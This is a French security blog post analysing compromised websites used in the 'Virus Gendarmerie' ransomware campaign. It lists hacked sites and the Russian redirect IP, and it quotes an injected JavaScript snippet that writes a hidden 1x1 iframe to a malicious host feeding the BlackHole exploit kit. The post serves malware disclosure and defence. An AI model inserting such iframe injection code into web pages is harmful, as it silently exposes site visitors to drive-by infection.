91.196.216.64 : Hack de sites Web FR pour le virus gendarmerie

On continue avec le TDS et la campagne du Virus Gendarmerie en France.
Comme vous pouvez le constater ci-dessous, les redirections sont toujours aussi énormes.

Alors que la malvertising de clicksor.com est toujours active, les redirections via ZeroAccess ont un peu baissé.
On constate que l’adresse des malvertising reste en tête (sp-adhitcounter.com).
On peux aussi constater que pas mal de sites ont été hackés pour conduire à l’exploit sur site WEB pour dropper le malware.

Voici une liste :

hxtp://www.lesinrocks.com
hxtp://www.sport.ro
hxtp://www.aide-et-action.org
hxtp://www.leblogpatrimoine.com
hxtp://runforyourlives.com
hxtp://ococean.com
hxtp://wiegaertnerfilms.com
hxtp://www.glennismusic.nl/
hxtp://www.assassinscreedfrance.fr
hxtp://www.yalibnan.com
hxtp://lafabriquehexagonale.com
hxtp://www.bullesdegones.com/
hxtp://le-site-du-skateboard.com/
hxtp://terrariawiki.fr
hxtp://www.glennismusic.nl
hxtp://www.aisne.com
hxtp://www.beloteweb.eu
hxtp://www.guzet.fr
hxtp://www.sxminfo.com
hxtp://www.letsbefriendsagain.com
hxtp://stirileprotv.ro/
hxtp://www.vinaigreblanc.com/
hxtp://itiswhatitis.weei.com
hxtp://www.torrent-francais.fr
hxtp://minecraft.fr/forum/index.php

Notamment ci-dessous le site “lesinrocks.com” qui a un ranking de 12k environ ce qui est pas mal.

Ci-dessous la connexion à l’URL malicieuse 91.196.216.64/s.php (RU) avec les paramètres – que l’on retrouve bien entendu sur tous les sites hackés :

Ci-dessous quelques exemples de pages modifiées avec l’ajout du code. Par exemple dans le cas du site lesinrock, pas mal de pages qui sont chargées par la page d’index sont touchées, ce qui va rendre la désinfection plus difficile.


Le code est en hexadécimal, le site suivant permet de passer en ASCII http://www.yellowpipe.com/yis/tools/encrypter/index.php
On retrouve l’IP Russe.

 

 

La page fait office de redirections pour attaquer le BlackHole via une iframe – BlacHole étant pour rappel, le Exploit WebKit qui gère le charge de l’infection :
element=document.getElementById('nf_co');
if(!element){
document.write('<iframe src="//hgjfjg55555555555555.nl.ai/in.cgi?6" id="nf_co" width="1" height="1"></iframe>');
}


Je vous fait grâce de la suite avec le chargement de l’infection via l’exploit – je pense qu’avec les divers sujets précédents, vous avez compris.

On voit donc, une troisième phase via des hacks de site WEB – Cela permet de maintenir une campagne active et infecter encore pas mal d’internautes.

EDIT quelques autres sites touchés :

hxtp://www.aide-et-action.org
hxxp://artoftheguillotine.edu
hxtp://www.yariga.ne
hxtp://ococean.com
hxtp://www.yalibnan.com
hxtp://www.oobby.com
hxtp://www.healthy-magazine.co.uk
hxtp://www.letsbefriendsagain.com
hxtp://www.oobby.com/tag/angry-birds
hxtp://parkablogs.com
hxtp://www.3ddesktops.co.uk
hxtp://www.robertsautosales.com
hxtp://www.tendal.eu
hxtp://lafabriquehexagonale.com
hxtp://decorhacks.com
hxtp://www.guzet.fr
hxtp://www.gummibar.net
hxtp://counterpropaganda.ie
hxtp://www.glennismusic.nl
hxtp://wiegaertnerfilms.com
hxtp://indius.fr
hxtp://www.tipsgames.net
hxtp://wahackpokemon.com
(Visité 78 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Vous pouvez lire les articles et tutoriels suivants en rapport avec cette page :
Tutoriel Malwarebytes Anti-MalwareTutoriel Antivirus

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com